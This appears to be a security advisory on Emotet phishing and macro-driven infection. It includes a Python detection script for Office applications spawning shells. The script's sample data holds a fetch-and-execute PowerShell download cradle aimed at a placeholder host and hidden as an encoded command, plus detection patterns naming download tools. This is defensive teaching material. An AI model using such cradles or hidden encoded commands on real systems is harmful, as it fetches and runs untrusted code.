What is Emotet?
Emotet is malware originally classified as a banking trojan. It is under continual development by actors whose skills are on par with those of professional software engineers. Its modular design lets its developers update and replace code as needed to add features. Trend Micro researchers have also reported two sets of infrastructure in the Americas that distribute malicious documents and binaries, with new iterations released daily.
The current initial infection vector for Emotet is most commonly a malicious Microsoft Office document; past iterations have also used executable binaries disguised to look like PDF files. The initial infection material is most commonly delivered by email: prospective victims receive phishing messages resembling online order and shipping confirmations, invoices, or other receipts. After the recipient clicks a malicious link in the email or opens the attachment, Microsoft Office opens the document and prompts the user to enable macros. Once macros are enabled, the older document versions spawn a combination of cmd.exe and PowerShell processes to download further stages of Emotet. When fully deployed within an enterprise network this is a particularly nasty piece of malware, because it enables the download and execution of additional malware.
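The process chain just described (an Office application opening the document, the macro spawning cmd.exe and PowerShell to fetch the next stage) is what behavioural detection should key on. The script below is an added example, not code from this page or from any vendor: it runs a simple detection over constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), flags an Office parent launching a shell, and decodes PowerShell's -EncodedCommand argument, which droppers of this kind commonly use to hide a download cradle. The sample events, the command lines and the example.invalid host are all constructed for illustration.

```python
"""Flag the process chain the text describes: an Office application spawning
cmd.exe / PowerShell, optionally with an encoded download cradle.

The events below are constructed sample data shaped like Sysmon Event ID 1
fields (ParentImage, Image, CommandLine); they are not real telemetry.
"""
import base64
import re

# Office applications that should almost never be the parent of a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# cmd.exe and PowerShell are what the page describes; the script hosts are
# the other common macro launch targets.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Download primitives typically used to pull the next stage.
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|bitsadmin",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Return findings for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    findings = []

    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        findings.append(f"office-spawn: {parent} -> {child}")

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-powershell")

    # Check both the visible command line and the decoded payload for a cradle.
    if DOWNLOAD_CRADLE.search(cmdline) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
        findings.append("download-cradle")

    # Encoded PowerShell alone is noisy (admin tooling uses it); the Office parent
    # or a download cradle is what makes this worth paging on.
    alert = any(f.startswith("office-spawn") for f in findings) or "download-cradle" in findings
    return {"findings": findings, "decoded": decoded, "alert": alert}


# Constructed sample: a download cradle of the kind the page describes, pointing
# at a reserved .invalid host so nothing here resolves.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/inv/')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # 1. Word macro launches cmd.exe, which starts hidden, encoded PowerShell
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": f"cmd.exe /c powershell.exe -w hidden -nop -enc {SAMPLE_ENCODED}",
    },
    {   # 2. the PowerShell child itself; Office is no longer the direct parent
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -w hidden -nop -enc {SAMPLE_ENCODED}",
    },
    {   # 3. benign: a user double-clicks a document in Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n invoice.docx',
    },
    {   # 4. benign: scheduled admin script; -ep is ExecutionPolicy, not EncodedCommand
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ep Bypass -File C:\Scripts\nightly-backup.ps1",
    },
]


def alerts(events) -> list:
    """Analyze a batch of events and return only those that should alert."""
    hits = []
    for e in events:
        result = analyze_event(e)
        if result["alert"]:
            hits.append({"event": e, **result})
    return hits


if __name__ == "__main__":
    for hit in alerts(SAMPLE_EVENTS):
        print(hit["findings"], "|", hit["event"]["CommandLine"][:60])
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

Run against the constructed events, the first two alert (the Word-to-cmd.exe spawn, and the encoded PowerShell whose decoded payload contains a download cradle) while the two benign events produce no findings. The parent/child pairing is the robust signal: it survives changes to the document and to the second-stage URL, which is exactly what signature-based anti-virus does not.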
This kind of malware is built to spread: across your network, and even to business partners, whose addresses it harvests from infected mailboxes.
An example of an Emotet payload email is displayed below. The FBI issued a new warning about this today and we have received information that there is an active incident in the Lexington area.
Remember the Basics
- Be cautious about clicking links or opening attachments. If you did not expect to receive a message, verify it by calling the sender rather than replying to the email.
- Always be suspicious of attachments that ask you to enable macros; a legitimate invoice or receipt does not need them.
- Do not depend on your spam filter (Mimecast, for example) to stop this phishing; new lures appear daily and some will get through.
- Signature-based anti-virus protection is largely ineffective because the malware changes so rapidly; watching for behaviour such as Office spawning cmd.exe or PowerShell is more reliable.
- Train everyone who has access to your network; if you are not already doing so, please give us a call.